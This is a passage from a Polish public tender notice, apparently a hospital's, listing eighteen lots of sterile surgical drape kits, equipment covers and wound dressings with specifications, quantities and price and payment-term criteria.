	Opakowanie torebka papierowo-foliowa lub folia-folia z etykietą w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zaw. nr lot. Produkt sterylizowany zgodnie z normami wymaganymi prawem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna
 	 	miary	ilość do dnia 31.05.2016r.
 	 	(j.m.)	j.m.
1	Zestaw do zabiegów ginekologicznych:	1 zestaw	50
	Serweta chirurgiczna do zabiegów ginekologicznych dolnych o wymiarach 240/150x150 cm zintegrowana z nogawicami, posiada otwór samoprzylepny o wymiarach 10x15 cm w okolicach krocza - 1 szt. Serweta dwuwarstwowa o gramaturze min 63g/m2, odporność na rozerwanie na sucho/mokro: 180/155 kPa ,odporność na przenikanie cieczy min  160cm H2O.		
	Serweta dwuwarstwowa 100x150cm - 1 szt.		
	Torba samoprzylepna do przechwytywania płynów ze sztywnikiem 60x60cm - 1 szt.		
	Taśma samoprzylepna 9x49cm - 1 szt		
	Ręczniki chłonne 30x40cm - 2 szt.		
	Kieszeń dwukomorowa samoprzylepna ze sztywnikiem - 2x15x40cm - 1 szt.		
	Fartuch chirurgiczny L - 1 szt.		
	Fartuch chirurgiczny wzmocniony XL - 2 szt.		
	Osłona na stolik MAYO 79x145cm - 1 szt.		
	Serweta na stolik (owinięcie zestawu)150x200cm - 1 szt. Opakowanie torebka papierowo-foliowa lub folia-folia z etykietą w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zaw. nr lot. Produkt sterylizowany zgodnie z normami wymaganymi prawem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna	
 	 	miary	ilość do dnia 31.05.2016r.	
 	 	(j.m.)	j.m.	
1	Zestaw noworodkowy w składzie: 1.serweta kompresowa min. 80cmx60cm sztuk 1,  o  masie 40g/m2( 67% włokno wiskozowe, 33% włókno poliestrowe), wytrzymałosc na zrywanie wzdłużne równa lub powyżej 40 N/5cm, dane potwierdzone KDT   2.kocyk flanelowy min. 160cmx75cm 1 szt; 3.  czapeczka dla noworodka 1 szt, 4.podkład chłonny z pulpy celulozowej 1szt min. 60cmx60cm.	1 zestaw	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna
 	 	miary	ilość do dnia 31.05.2016r.	
 	 	(j.m.)	j.m.				
1	Zestaw do operacji barku z torbą:
1. Serweta do nakrycia stołu 
    instrumentariuszki 150 cm x 190 cm (+/- 5 
    cm) - 1 szt. 
2. Serweta chirurgiczna o wymiarach 
    170x240cm z wycięciem U o wymiarach 
    15x45 cm z taśmą samoprzylepną, 
    wyposażona w torbę do przechwytywania  
    płynów z możliwością podłączenia drenów 
    - 1 szt.. 
3. Serweta chirurgiczna o wymiarach  
    230x295 cm z wycięciem U o 
    wymiarach 10x70 cm wzmocniona 
    warstwą chłonną - 1 szt. 
4. Osłona na kończynę w rozmiarze 
    22x75 cm - 1 szt. 
5. Taśmy mocujące samoprzylepne 
    9x49 cm - 2 szt. 
6. Ręczniki chłonne o wymiarach 
    18x25 cm min. 4szt. 
7. Serweta do nakrycia stolika Mayo  
    79x145cm - 1szt.
8. Serweta o wymiarach 170x240 cm  
   wykonana z laminatu 3-warstwowego ( 2 
   warstwy włókniny o łącznej gramaturze   
   min. 50g/m2 oraz folii PE 15 mikronów) ; 
   strefa krytyczna o odporności na 
   przenikanie cieczy min.100 cm H2O. 
9. Serweta 230x295 cm w strefie mniej 
   krytycznej wykonana z laminatu 3-
   warstwowego ( włóknina 20g/m2 / folia PE 
   15 ?  / włóknina 30g/m2) z dodatkową 
   warstwą włókniny w strefie krytycznej o 
   gramaturze 50g/m2;  strefa krytyczna o 
   odporności na przenikanie cieczy min. 840 
   cm H2O. 
Obłożenie musi spełniać wymogi Normy EN 13 795, na potwierdzenie dołączyć kartę techniczną gotowego sterylnego wyrobu.
Na opakowaniu jednostkowym produktu 
wymagana jest etykieta z przynajmniej 4 samoprzylepnymi naklejkami posiadającymi
 indeks wyrobu (kod kreskowy, numer LOT,
 datę ważności).
	1 zestaw	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna
 	 	miary	ilość do dnia 31.05.2016r.	
 	 	(j.m.)	j.m.			
1	Zestaw do artroskopii kolana:
1. Serweta chirurgiczna do zabiegu w 
   okolicach stawu kolanowego o wymiarach 
   230x320 cm, posiadający 
   samouszczelniający otwór z neoprenu o 
   średnicy 7 cm, z możliwością zamocowania 
   drenów. Serweta jest wyposażona w torbę 
   do przechwytywania płynów z możliwością 
   podłączenia drenu - 1 szt. 
2. Serweta dodatkowa na stolik  w rozmiarze   
   150 x 190 cm - 1 szt.
3. Osłona na kończynę 22 x 75 cm - 1 szt. 
4. Taśmy samoprzylepne - min. 2 szt.
5. Ręczniki chłonne - min. 4 szt.
6. Osłona na stolik MAYO 79x145cm, 
    warstwa chłonna 65x85cm - 1  szt. 
7. Osłona na stolik - 
    (owinięcie zestawu) 150 x 190 cm
Zestaw musi spełniać wymagania wysokie wg normy normy PN EN 13795 1-3 na potwierdzenie       dołączyć     kartę kartę techniczną gotowego sterylnego wyrobu . 
Wytrzymałość na wypychanie/rozrywanie w 
strefie krytycznej na poziomie min. 65 kPa 
Materiał podstawowy serwety głównej 
składający się min. z  2 warstw ( folia PE oraz wartswa chłonna ) o łącznej gramaturze min. 60 g/m2
Opakowanie torebka papierowo-foliowa lub folia-folia z etykietą w języku polskim z przynajmniej 
dwoma naklejkami do wklejenia do 
dokumentacji medycznej zaw. nr lot.
 Produkt sterylizowany zgodnie z normami wymaganymi prawem

	1 zestaw	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna
 	 	miary	ilość do dnia 31.05.2016r.
 	 	(j.m.)	j.m.			
1	Zestaw do Kraniotomii:
1. Serweta chirurgiczna do zabiegów w
 okolicy głowy o wymiarach 240/180
x 310 cm posiadająca otwór
wypełniony folią chirurgiczną o wymiarach
 25x20 cm, wyposażona w  dodatkową 
warstwę chłonna
wokół otworu o wymiarach 100x80 cm z
 trzema zakładkami oraz zintegrowany 
worek foliowy do przechwytywania płynów 
 1 szt.
2. Serwety chirurgiczne 50x50cm z taśmą samoprzylepną do zabezpieczenia 
headrestu 3 szt.
3. Fartuch chirurgiczny SMS o gramaturze 
min.35 g/m2, rozm. L - 2 szt.
4. Fartuch chirurgiczny SMS o gramaturze
 min.35 g/m2, rozm. XL - 1 szt.
5. Kompres gazowy 10x10cm, 17N, 8 warstwowy,biały - 50 szt.
6. Serweta gazowa 45x45cm, 17N, 4 
warstwowy, znacznik RTG, biały - 5 szt.
7. Tupfer gazowy okrągły nr 3, 20N, 
znacznik RTG, biały - 10 szt.
8. Miska z polipropylenu z podziałką 250ml 
- 1 szt.
9. Skalpel chirurgiczny z wysuwanym 
ostrzem nr 11 - 1 szt.
10. Skalpel chirurgiczny z wysuwanym 
ostrzem nr 22 - 1 szt.
11. Dren łączący do ssaka PVC 24Ch/15Ch, 
3,5 m - 1 szt.
12. Kleszczyki blokowane do materiałów opatrunkowych 24,7 cm - 1 szt.
13. Taśma samoprzylepna 9x18cm typu
 RZEP 1 szt.
14. Taśmy samoprzylepne 9x49cm - 2 szt.
15. Ręczniki chłonne 30x40cm - 2 szt.
16. Kieszeń dwukomorowa samoprzylepna
 ze sztywnikiem 2x15x30cm - 1 szt.
17. Kieszenie jednokomorowe
 samoprzylepne ze sztywnikiem 40x35cm -
 2 szt.
18. Czerwona osłona na stolik MAYO
 80x145cm - 1 szt.
19. Serweta na stolik - (owinięcie zestawu)
 150-190cm - 1 szt.
20 Zestaw o gramaturze min 63g/m2 w
 obszarze mniej krytycznym (laminat dwuwarstwowy). Gramatura min 83g/m2 
w obszarze krytycznym (laminat 
trójwarstwowy). Odporność na rozerwanie
 na sucho/mokro: 112/108 kPa w strefie
 krytycznej. Odporność na przenikanie 
cieczy strefa mniej krytyczna/strefa 
krytyczna   min  160/345 cm H2O.
21. Opakowanie torebka papierowo-foliowa
 lub folia-folia z etykietą w języku polskim
 z przynajmniej dwoma naklejkami do 
wklejenia do dokumentacji medycznej zaw. 
nr lot. Produkt sterylizowany zgodnie z
 normami wymaganymi prawem.
	1 zestaw	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna	
 	 	                   miary	ilość do dnia 31.05.2016r
 	 	(j.m.)	j.m.				
1	Samoogrzewający koc:
* Obłożenie pacjenta samoogrzewające, 
   wykonane z włókniny typu SMS, osiągające 
   w ciągu 30 minut po otwarciu i rozłożeniu 
   temperaturę min. 39 °C maks. 43 °C, 
   średnia temperatura koca utrzymywana 
    przez okres min 9 godzin. 
* Wymiary koca 
   152 cm x 92 cm ( tolerancja rozmiarów+/-  
   2%), koc zawiera min. 12 specjalnie  
   wkomponowanych kieszeni 13 cm x 10 cm 
   ( tolerancja rozmiarów +/- 1%) 
   wypełnionych wkładkami grzejnymi. 
* Wkładki grzejne wykonane wyłącznie z 
   naturalnych składników ( węgiel, żelazo, 
   woda, sól, minerał ilasty - wermikulit ).
 *Konstrukcja wyrobu zapewnia możliwość 
   użycia koca w różnych wariantach przed, 
   podczas i po operacji ( zabezpieczenie 
   całego pacjenta, zabezpieczenie górnej 
bądź 
   dolnej części ciała pacjenta, z łatwym 
   dojściem do pola operacyjnego). 
* Wymagane parametry należy potwierdzić 
   poprzez załączenie do oferty karty danych 
   technicznych wystawionej przez producenta  
  wyrobu.



	1 sztuka	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1.organizator przewodów o wymiarach 13,3 cm x 3,8 cm jest białym przylepcem z ruchomą częścią w środkowej części umożliwiającą swobodne wielokrotne przyklejanie i odklejanie. Organizator pozwala na przyklejenie do obłożenia, serwety czy fartucha itp.. Drenów, kabli i przewodów. organizator może być przyklejony do każdego typu materiału, zktórego wykonywane są obłożenia, fartuchy czy serwety operacyjne. Zastosowany klej jest klejem akrylowym, repozycjonowalnym - co pozwala na wielokrotne przyklejanie i odklejanie bez ryzyka uszkodzenia organizatora i materiału, do którego jest przyklejany.
	opakowanie po 100 sztuk	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1.Sterylne obłożenie urologiczne (TUR) o nastepującym składzie minimalnym: 1 serweta chirurgiczna przeznaczona do zabiegów urologicznych o wymiarach 175/270 x 180 cm zintegrowana z nogawicami, posiadajaca otwór samoprzylepny w okolicy jamy brzusznej (fi 8), otwór na prącie (fi 5) i osłoną na palec do badania per rectum; serweta posiada worek do przechwytywania płynów z sitem i podłączeniem do drenu, 1 ręcznik chłonny 18 x 25 cm, 1 samoprzylepny organizator przewodów 9 x 18 cm, 1 serweta na stolik ( owinięcie zestawu) 150 x 190 cm : odporność na penetrację płynów większe lub równe1600 mm H2O; wytrzymałość na rozdarcie/rozerwanie na sucho/mokro większe lub równe180/150 kPa; gramatura min 63 g/m2; absorpcja włókniny min 650%; współczynnik układalności min 75%; obłożenie powinno spałniać wymagania wysokiej strefy krytycznej na całej powierzchni zgodnie z normą PN-EN 13795-3+A1:2010
	1 zestaw	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1. serweta chirurgiczna do PCNL o wymiarach 180x300 cm posiadająca otwór samoprzylepny o wymiarach 20 x 23 cm i worek wyposażony w sztywnik do przechwytywania płynów  - 1 szt: serweta na stolik - (owinięcie zestawu) 100 cm x 150 cm - 1 szt;	1 zestaw	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1.substytut skóry 5 x 5 cm - wchłanialna, mikroporowa błona i alloplastyczny substytut skóry przeznaczony do leczenia powierzchwych ran skórnych, ran po pobraniu przeszczepów, oparzenie drugiego stopnia	1 sztuka	15
2.substytut skóry 9  x 10 cm - wchłanialna, mikroporowa błona i alloplastyczny substytut skóry przeznaczony do leczenia powierzchwych ran skórnych, ran po pobraniu przeszczepów, oparzenie drugiego stopnia	1 sztuka	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1. Kieszeń samoprzylepna sterylna jednokomorowa trójkątna z zaworem do podłączania drenu rozm min 60x60 cm wykonana z folii przezroczystej	1 sztuka	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.

1.Sterylna osłona foliowa z taśmami do mocowania na ramię C aparatu RTG, 
o wymiarach min 100 x 220 cm
	1 sztuka	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1. sterylny pokrowiec na aparaturę o wymiarach 42 x 25 cm, wykonany z mocnej przezroczystej folii PE ściągnięty elastyczną gumką umożliwiający łatwe nałożenie na przyrząd	1 sztuka	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1.Jednorazowa, sterylna, bez lateksowa osłona na mikroskop. Do zastosowania w mikroskopie z trzema okularami. Rozmiar osłony 117cm(+/- 1cm) na 267cm (+/- 1cm). Soczewka o średnicy 65mm o dużej przezierności, odporna na zarysowania, z materiału nie odbijającego światła i nie tłukącego. Produkt posiadający trzy  pasy ściągające - umożliwiające mocowanie na mikroskopie. 	1 sztuka	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.	

1.Osłona na sprzęt medyczny, do sterylnego obłożenia różnego typu sprzętu medycznego, wykończona elastycznym brzegiem.Przezroczysta. 85 x 150 cm	sztuka	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.Opis wyrobu	Jednostka	Potrzebna
 	miary	ilość do dnia 31.05.2016r.
 	(j.m.)	j.m.
1. kolagenowy resorbowalny opatrunek hemostatyczny składający się w 100% z czystych, naturalnych, luźnych włókien kolagenowych (opatrunek włókienkowy); jest to miękki, elastyczny, nietkany i sprasowany opatrunek, który można łatwo umieścić w ranie i ponownie usunąć, jeśli zachodzi taka potrzeba; jest nietoksyczny i można go pozostawić wewnątrz organizmu, gdzie po około 6 tygodniach całkowicie się resorbuje; typu fibrillar; rozmiar 1,0 g. 	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.		Wielkość	Jednostka	Potrzebna	
 	Opis wyrobu	rozmiar	miary	ilość do dnia 31.05.2016r.	
 	 	 	(j.m.)	j.m.	 	 	 	
1	.Opatrunek z hydrofobowej siatki poliamidowej o małych oczkach,
impregnowany maścią na bazie
trójglicerydów nie zawierajacych
substancji czynnych pokryta
srebrem metalicznym; opakowanie
jednostkowe posiadające podziałkę
centymetrową służącą do mierzenia
wielkości rany.	10cm x 10cm	op. 10szt.	50	 	 	 	 	 	 	 	 
2.	Alginianowo - wapniowy jałowy,
nietkany opatrunek w postaci
włókien; kompres.	10cm x 10cm	op. 10szt.	35	 	 	 	 	 	 	 	 
3.	folia poliuretanowa, jałowa,
przezroczysta, samoprzylepna,
wodoodporna, z hipoalergiczną
warstwą klejąca	10 x 15 cm	op. 10szt.	180	 	 	 	 	 	 	 	 
4.	folia poliuretanowa, jałowa,
przezroczysta, samoprzylepna,
wodoodporna, z hipoalergiczną
warstwą klejąca	6 x 7 cm	op. 10szt.	70	 	 	 	 	 	 	 	 
5.	włókninowy, jałowy plaster do
mocowania kaniul z nacięciem o
zaokrąglonych rogach, z centralnie
położonym materiałem
chłonnym i dodatkową poduszeczką	6 x 8 cm 	op*50 szt	1 800	 	 	 	 	 	 	 	 
6.	Jałowy opatrunek dla ran
wymagających aktywnego
oczyszczania, opatrunek
aktywowany roztworem Ringnera.	10cm x 10cm	op.10 szt	15	 	 	 	 	 	 	 	 
7.	Jałowy opatrunek dla ran
wymagających aktywnego
oczyszczania, opatrunek
aktywowany roztworem Ringnera.	7,5 cm x 7,5
cm	op.10 szt	15	 	 	 	 	 	 	 	 
8	.opatrunek piankowy jałowy z
warstwą hydrożelu * warstwa
chłonna - pianka poliuretanowa
* warstwa kontaktowa - zawierająca
wodę poliurea/hybrydowy polimer
poliuretanowy o strukturze siatkowej,
samoprzylepny	12,5cm x 12,5cm	op.10 szt	35	 	 	 	 	 	 	 	 
9.	Jałowy hydroaktywny opatrunek z
pianki poliuretanowej, zatrzymujacy
90% płynów wysiękowych,
pozostający na ranie do 4 dni,	10cm x 10cm	op.10 szt	15	 	 	 	 	 	 	 	 
10	.Jałowy hydroaktywny opatrunek z
pianki poliuretanowej, zatrzymujacy
90% płynów wysiękowych,
pozostający na ranie do 4 dni,	10 cm x 20
cm	op.5 szt	10	 	 	 	 	 	 	 	 
11	.Jałowy hydroaktywny opatrunek z
pianki poliuretanowej z warstwą
samoprzylepną wokół pianki
zatrzymujacy 90% płynów
wysiękowych, pozostający na ranie
do 4 dni, 	11 cm x 11
cm	op.10 szt	15	 	 	 	 	 	 	 	 
12.	opatrunek hydrokoloidowy zaw. 1
hydrokoloid: *
karboksymetyloceluloza sodowa
(CMC)
zawieszone w macierzy polimerowej	10 cm x 10
cm	op.10 szt	15	 	 	 	 	 	 	 	 
13	.opatrunek hydrokoloidowy zaw. 1
hydrokoloid: *
karboksymetyloceluloza sodowa
(CMC)
zawieszone w macierzy polimerowej	15 cm x 15
cm	op.5 szt	30	 	 	 	 	 	 	 	 
14.	opatrunek hydrokoloidowy zaw. 1
hydrokoloid: *
karboksymetyloceluloza sodowa
(CMC)
zawieszone w macierzy polimerowej	20 cm x 20
cm	op.5 szt	30	 	 	 	 	 	 	 	 
15	.opatrunek hydrokoloidowy cienki 1
hydrokoloid: *
karboksymetyloceluloza sodowa
(CMC)
zawieszone w macierzy polimerowej	10 cm x 10
cm	op.10 szt	30	 	 	 	 	 	 	 	 
16	.Opatrunek samoprzylepny jałowy, chłonny, posiadający centralnie umieszczoną warstwę chłonną ze 100% wiskozy, zaokrąglone rogi, przecięcie papieru wzdłuż krótszego boku, zewnętrzną stronę z
impregnacją wodoodporną, z klejem kauczukowym niepowodującym
podrażnień, przepuszczalny dla pary wodnej i powietrza, 	25 x 10 cm	op*25 szt	400	 	 	 	 	 	 	 	 
17	.Opatrunek samoprzylepny jałowy, chłonny, posiadający centralnie umieszczoną warstwę chłonną ze 100% wiskozy, zaokrąglone rogi, przecięcie papieru wzdłuż krótszego boku, zewnętrzną stronę z
impregnacją wodoodporną, z klejem kauczukowym niepowodującym
